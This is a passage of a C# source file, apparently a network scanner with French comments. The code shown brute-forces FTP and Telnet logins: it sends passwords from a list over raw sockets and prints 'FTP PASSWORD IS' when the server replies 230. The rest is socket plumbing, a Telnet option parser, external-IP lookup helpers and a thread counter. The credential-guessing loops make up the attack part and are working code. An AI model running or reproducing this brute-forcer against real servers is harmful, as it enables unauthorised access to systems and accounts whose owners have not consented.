2939. Console.WriteLine("{0} -> Response ftp: " + stringdata, myip);
2940. //530 Login incorrect.
2941. //530 Not logged in.
2942. //530 User admin cannot log in.
2943. if (stringdata.Contains("530"))
2944. {
2945. Console.Write("{0} -> bad ftp password: {1}\n", myip, password);
2946. }
2947. //230 User logged in, proceed.
2948. if (stringdata.Contains("230"))
2949. {
2950. Console.Write("{0} -> FTP PASSWORD IS: {1}\n", myip, password);
2951. break;
2952. }
2953.  
2954. }
2955. catch (Exception e)
2956. {
2957. Console.WriteLine("{0} -> " + e.Message, myip);
2958. }
2959. }
2960.  
2961. Sock_scan.Close();
2962.  
2963. /*
2964. FtpWebRequest reqFTP;
2965. reqFTP = (FtpWebRequest)FtpWebRequest.Create(new Uri("ftp://" + myip+"/"));
2966. reqFTP.Credentials = new NetworkCredential("login", "pass");
2967. reqFTP.KeepAlive = false;
2968. reqFTP.Method = WebRequestMethods.Ftp.ListDirectory;
2969. // On recupere la response du serveur FTP
2970. FtpWebResponse response = (FtpWebResponse)reqFTP.GetResponse();
2971. Console.WriteLine("{0} -> Réponse FTP:" + response, myip);
2972.  
2973. /*
2974. // On récupere le flux de la réponse
2975. StreamReader monStreamReader = new StreamReader(response.GetResponseStream(), Encoding.Default);
2976. //On enregistre la liste dans un chaine
2977. string listeBrute = monStreamReader.ReadToEnd();
2978. //On recupere l'ensemble des fichiers de la chaine
2979. string[] liste = listeBrute.Split(Environment.NewLine.ToCharArray()[0]);
2980. //On retourne la liste des répertoires
2981. //return liste;
2982. */
2983.  
2984.  
2985. }
2986.  
2987. /*
2988. public static void ConnectCallback(IAsyncResult ar)
2989. {
2990. try
2991. {
2992. // Get The connection socket from the callback
2993. Socket sock1 = (Socket)ar.AsyncState;
2994. sock1.Blocking = false; // This is a non blocking IO
2995. if (sock1.Connected)
2996. {
2997. // Define a new Callback to read the data
2998. AsyncCallback recieveData = new AsyncCallback(OnRecievedData);
2999. // Begin reading data asyncronously
3000. sock1.BeginReceive(m_byBuff, 0, m_byBuff.Length, SocketFlags.None, recieveData, sock1);
3001. }
3002. }
3003. catch (Exception ex)
3004. {
3005. Console.WriteLine(ex.Message, "Setup Recieve callbackProc failed!");
3006. }
3007. }
3008. */
3009.  
3010. private static void ConnectCallback(IAsyncResult ar)
3011. {
3012. try
3013. {
3014.  
3015. // Retrieve the socket from the state object.
3016. Socket client = (Socket)ar.AsyncState;
3017.  
3018. // Complete the connection.
3019. client.EndConnect(ar);
3020.  
3021. Console.WriteLine("Socket connected to {0}",
3022. client.RemoteEndPoint.ToString());
3023.  
3024. // Signal that the connection has been made.
3025. connectDone.Set();
3026.  
3027. Console.WriteLine("DEBUG ConnectCallback");
3028. //cpt_th.Decrementer();
3029. }
3030. catch (Exception e)
3031. {
3032. Console.WriteLine("ERROR ConnectCallback: "+e.ToString());
3033. }
3034. }
3035.  
3036. private static void Receive(Socket client)
3037. {
3038. try
3039. {
3040. // Create the state object.
3041. StateObject state = new StateObject();
3042. state.workSocket = client;
3043.  
3044. // Begin receiving the data from the remote device.
3045. client.BeginReceive(state.buffer, 0, StateObject.BufferSize, 0,
3046. new AsyncCallback(ReceiveCallback), state);
3047. }
3048. catch (Exception e)
3049. {
3050. Console.WriteLine(e.ToString());
3051. }
3052. }
3053.  
3054. private static void ReceiveCallback(IAsyncResult ar)
3055. {
3056. try
3057. {
3058. // Retrieve the state object and the client socket
3059. // from the asynchronous state object.
3060. StateObject state = (StateObject)ar.AsyncState;
3061. Socket client = state.workSocket;
3062.  
3063. // Read data from the remote device.
3064. int bytesRead = client.EndReceive(ar);
3065.  
3066. if (bytesRead > 0)
3067. {
3068. // There might be more data, so store the data received so far.
3069. state.sb.Append(Encoding.ASCII.GetString(state.buffer, 0, bytesRead));
3070.  
3071. // Get the rest of the data.
3072. client.BeginReceive(state.buffer, 0, StateObject.BufferSize, 0,
3073. new AsyncCallback(ReceiveCallback), state);
3074. }
3075. else
3076. {
3077. // All the data has arrived; put it in response.
3078. if (state.sb.Length > 1)
3079. {
3080. response = state.sb.ToString();
3081. }
3082. // Signal that all bytes have been received.
3083. receiveDone.Set();
3084. }
3085. }
3086. catch (Exception e)
3087. {
3088. Console.WriteLine(e.ToString());
3089. }
3090. }
3091.  
3092.  
3093. // State object for receiving data from remote device.
3094. public class StateObject
3095. {
3096. // Client socket.
3097. public Socket workSocket = null;
3098. // Size of receive buffer.
3099. public const int BufferSize = 256;
3100. // Receive buffer.
3101. public byte[] buffer = new byte[BufferSize];
3102. // Received data string.
3103. public StringBuilder sb = new StringBuilder();
3104. }
3105.  
3106.  
3107.  
3108.  
3109.  
3110.  
3111. private static string ProcessOptions(byte[] m_strLineToProcess)
3112. {
3113. string m_DISPLAYTEXT = "";
3114. string m_strTemp = "";
3115. string m_strOption = "";
3116. string m_strNormalText = "";
3117. bool bScanDone = false;
3118. int ndx = 0;
3119. int ldx = 0;
3120. char ch;
3121. try
3122. {
3123. for (int i = 0; i < m_strLineToProcess.Length; i++)
3124. {
3125. Char ss = Convert.ToChar(m_strLineToProcess[i]);
3126. m_strTemp = m_strTemp + Convert.ToString(ss);
3127. }
3128.  
3129. while (bScanDone != true)
3130. {
3131. int lensmk = m_strTemp.Length;
3132. ndx = m_strTemp.IndexOf(Convert.ToString(IAC));
3133. if (ndx > lensmk)
3134. ndx = m_strTemp.Length;
3135.  
3136. if (ndx != -1)
3137. {
3138. m_DISPLAYTEXT += m_strTemp.Substring(0, ndx);
3139. ch = m_strTemp[ndx + 1];
3140. if (ch == DO || ch == DONT || ch == WILL || ch == WONT)
3141. {
3142. m_strOption = m_strTemp.Substring(ndx, 3);
3143. string txt = m_strTemp.Substring(ndx + 3);
3144. m_DISPLAYTEXT += m_strTemp.Substring(0, ndx);
3145. m_ListOptions.Add(m_strOption);
3146. m_strTemp = txt;
3147. }
3148. else
3149. if (ch == IAC)
3150. {
3151. m_DISPLAYTEXT = m_strTemp.Substring(0, ndx);
3152. m_strTemp = m_strTemp.Substring(ndx + 1);
3153. }
3154. else
3155. if (ch == SB)
3156. {
3157. m_DISPLAYTEXT = m_strTemp.Substring(0, ndx);
3158. ldx = m_strTemp.IndexOf(Convert.ToString(SE));
3159. m_strOption = m_strTemp.Substring(ndx, ldx);
3160. m_ListOptions.Add(m_strOption);
3161. m_strTemp = m_strTemp.Substring(ldx);
3162. }
3163. }
3164. else
3165. {
3166. m_DISPLAYTEXT = m_DISPLAYTEXT + m_strTemp;
3167. bScanDone = true;
3168. }
3169. }
3170. m_strNormalText = m_DISPLAYTEXT;
3171. }
3172. catch (Exception eP)
3173. {
3174. Console.WriteLine(eP.Message, "Application Error!!!");
3175. //Application.Exit();
3176. }
3177. return m_strNormalText;
3178. }
3179.  
3180. public static void OnRecievedData(IAsyncResult ar)
3181. {
3182. // Get The connection socket from the callback
3183. Socket sock = (Socket)ar.AsyncState;
3184. sock.Blocking = false; // This is a non blocking IO
3185. // Get The data , if any
3186. int nBytesRec = sock.EndReceive(ar);
3187. if (nBytesRec > 0)
3188. {
3189. string sRecieved = Encoding.ASCII.GetString(m_byBuff, 0, nBytesRec);
3190. string m_strLine = "";
3191. string myline = null;
3192. for (int i = 0; i < nBytesRec; i++)
3193. {
3194. Char ch = Convert.ToChar(m_byBuff[i]);
3195. switch (ch)
3196. {
3197. case '\r':
3198. m_strLine += Convert.ToString("\r\n");
3199. break;
3200. case '\n':
3201. break;
3202. default:
3203. m_strLine += Convert.ToString(ch);
3204. break;
3205. }
3206. }
3207. try
3208. {
3209. int strLinelen = m_strLine.Length;
3210. if (strLinelen == 0)
3211. {
3212. m_strLine = Convert.ToString("\r\n");
3213. }
3214.  
3215. Byte[] mToProcess = new Byte[strLinelen];
3216. for (int i = 0; i < strLinelen; i++)
3217. mToProcess[i] = Convert.ToByte(m_strLine[i]);
3218. // Process the incoming data
3219. string mOutText = ProcessOptions(mToProcess);
3220. //if (mOutText != "")
3221. // textBox1.AppendText(mOutText);
3222. myline+=mOutText;
3223. //Console.WriteLine("Received data: {0}", mOutText);
3224.  
3225. // Respond to any incoming commands
3226. //RespondToOptions();
3227. }
3228. catch (Exception ex)
3229. {
3230. //Object x = this;
3231. Console.WriteLine(ex.Message, "Information!");
3232. }
3233. Console.WriteLine("Received data: {0}", myline);
3234.  
3235.  
3236. if (myline.Contains("Password:"))
3237. {
3238. foreach (string password in passwords)
3239. {
3240. Thread.Sleep(100);
3241. try
3242. {
3243. //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
3244. sock.Send(System.Text.Encoding.ASCII.GetBytes(password));
3245. //Thread.Sleep(100);
3246. byte[] data = new byte[1024];
3247. //string banner;
3248. int recv;
3249. recv = sock.Receive(data);
3250. string stringdata = Encoding.ASCII.GetString(data, 0, recv);
3251. Console.WriteLine("{0} -> Response telnet: " + stringdata);
3252.  
3253. ///*
3254. //strRetPage = null;
3255. //bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
3256. //strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
3257.  
3258. //while (bytes > 0)
3259. //{
3260. // bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
3261. // strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
3262. //}
3263. //Console.WriteLine("Response telnet: " + strRetPage);
3264. //*
3265.  
3266. //Bad Password!!!
3267. if (stringdata.Contains("*") || stringdata.Contains("Password:") || stringdata.Contains("Bad Password"))
3268. {
3269. Console.Write("{0} -> bad telnet password: {1}\n", password);
3270. }
3271. }
3272. catch (Exception e)
3273. {
3274. Console.WriteLine("{0} -> " + e.Message);
3275. }
3276. }
3277.  
3278. }
3279.  
3280.  
3281.  
3282. }
3283. else
3284. {
3285. // If no data was recieved then the connection is probably dead
3286. Console.WriteLine("Disconnected", sock.RemoteEndPoint);
3287. sock.Shutdown(SocketShutdown.Both);
3288. sock.Close();
3289. }
3290. }
3291.  
3292. public string LocalIPAddress()
3293. {
3294. IPHostEntry host;
3295. string localIP = "";
3296. host = Dns.GetHostEntry(Dns.GetHostName());
3297. foreach (IPAddress ip in host.AddressList)
3298. {
3299. if (ip.AddressFamily.ToString() == "InterNetwork")
3300. {
3301. localIP = ip.ToString();
3302. }
3303. }
3304. return localIP;
3305. }
3306.  
3307. public static IPAddress GetExternalIp()
3308. {
3309. string whatIsMyIp = "http://www.whatismyip.com/automation/n09230945.asp";
3310. WebClient wc = new WebClient();
3311. UTF8Encoding utf8 = new UTF8Encoding();
3312. string requestHtml = "";
3313. try
3314. {
3315. requestHtml = utf8.GetString(wc.DownloadData(whatIsMyIp));
3316. }
3317. catch (WebException we)
3318. {
3319. // do something with exception
3320. Console.Write(we.ToString());
3321. }
3322.  
3323. IPAddress externalIp = IPAddress.Parse(requestHtml);
3324. return externalIp;
3325. }
3326.  
3327. public static IPAddress GetExternalIp2()
3328. {
3329. WebClient client = new WebClient();
3330.  
3331. // Add a user agent header in case the requested URI contains a query.
3332. client.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)");
3333.  
3334. string baseurl = "http://checkip.dyndns.org/";
3335.  
3336. Stream data = client.OpenRead(baseurl);
3337. StreamReader reader = new StreamReader(data);
3338. string s = reader.ReadToEnd();
3339. data.Close();
3340. reader.Close();
3341. s = s.Replace("<html><head><title>Current IP Check</title></head><body>Current IP Address: ", "").Replace("</body></html>", "").ToString();
3342.  
3343. IPAddress externalIp = IPAddress.Parse(s);
3344. return externalIp;
3345. }
3346.  
3347. private void Lancer_Thread(object emetteur)
3348. {
3349. //Console.WriteLine("Evenement - Lancer_Thread");
3350. lock (this)
3351. {
3352. // Console.WriteLine("DEBUG PULSE");
3353. Monitor.Pulse(this);
3354. }
3355. }
3356.  
3357. public class Compteur_thread
3358. {
3359. public enum Operation
3360. {
3361. Incrementer = 1,
3362. Decrementer = 2,
3363. Nb_thread = 3,
3364. Libre = 4,
3365. }
3366.  
3367. Operation operation = Operation.Incrementer;
3368.  
3369. int compteur = 0;
3370.  
3371. public delegate void Lancer_Thread(object emetteur);
3372.  
3373. public event Lancer_Thread lancer_thread;
3374.  
3375. public void Incrementer()
3376. {
3377. lock (this)
3378. {
3379. // Console.WriteLine("DEBUG INCREMENTER");
3380. if ((operation == Operation.Decrementer) || (operation == Operation.Nb_thread))
3381. {
3382. try
3383. {
3384. //Console.WriteLine("Incrementer - Monitor.Wait()");
3385. Monitor.Wait(this);
3386. }
3387. catch (SynchronizationLockException e)
3388. {
3389. Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
3390. }
3391. catch (ThreadInterruptedException e)
3392. {
3393. Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
3394. }
3395. }
3396.  
3397. //Console.WriteLine("Incrementer");
3398.  
3399. operation = Operation.Incrementer;
3400. compteur++;
3401.  
3402. Monitor.Pulse(this);
3403. operation = Operation.Libre;
3404. }
3405. }
3406.  
3407. public void Decrementer()
3408. {
3409. lock (this)
3410. {
3411. // Console.WriteLine("DEBUG DECREMENTER");
3412. if ((operation == Operation.Incrementer) || (operation == Operation.Nb_thread))
3413. {
3414. try
3415. {
3416. //Console.WriteLine("decrementer - Monitor.Wait()");
3417. Monitor.Wait(this);
3418. }
3419. catch (SynchronizationLockException e)
3420. {
3421. Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
3422. }
3423. catch (ThreadInterruptedException e)
3424. {
3425. Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
3426. }
3427. }
3428. //Console.WriteLine("decrementer");
3429.  
3430. operation = Operation.Decrementer;
3431. compteur--;
3432.  
3433. if (lancer_thread != null)
3434. lancer_thread(this);
3435.  
3436. Monitor.Pulse(this);
3437. operation = Operation.Libre;
3438. }
3439. }
3440.  
3441. public void Nb_thread(out int nb)
3442. {
3443. lock (this)
3444. {
3445. // Console.WriteLine("DEBUG NB_THREAD");
3446. if ((operation == Operation.Incrementer) || (operation == Operation.Decrementer))
3447. {
3448. try
3449. {
3450. //Console.WriteLine("Nb_thread - Monitor.Wait()");
3451. Monitor.Wait(this);
3452. }
3453. catch (SynchronizationLockException e)
3454. {
3455. Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
3456. }
3457. catch (ThreadInterruptedException e)
3458. {
3459. Console.WriteLine(e.ToString());//, "Thread", MessageBoxButtons.OK, MessageBoxIcon.Error);
3460. }
3461. }
3462.  
3463. //Console.WriteLine("Nb_Thread classe");
3464.  
3465. operation = Operation.Nb_thread;
3466. nb = compteur;
3467.  
3468. Monitor.Pulse(this);
3469. operation = Operation.Libre;
3470. }
3471. }
3472. }
3473.  
3474. }
3475.  
3476.  
3477.  
3478. }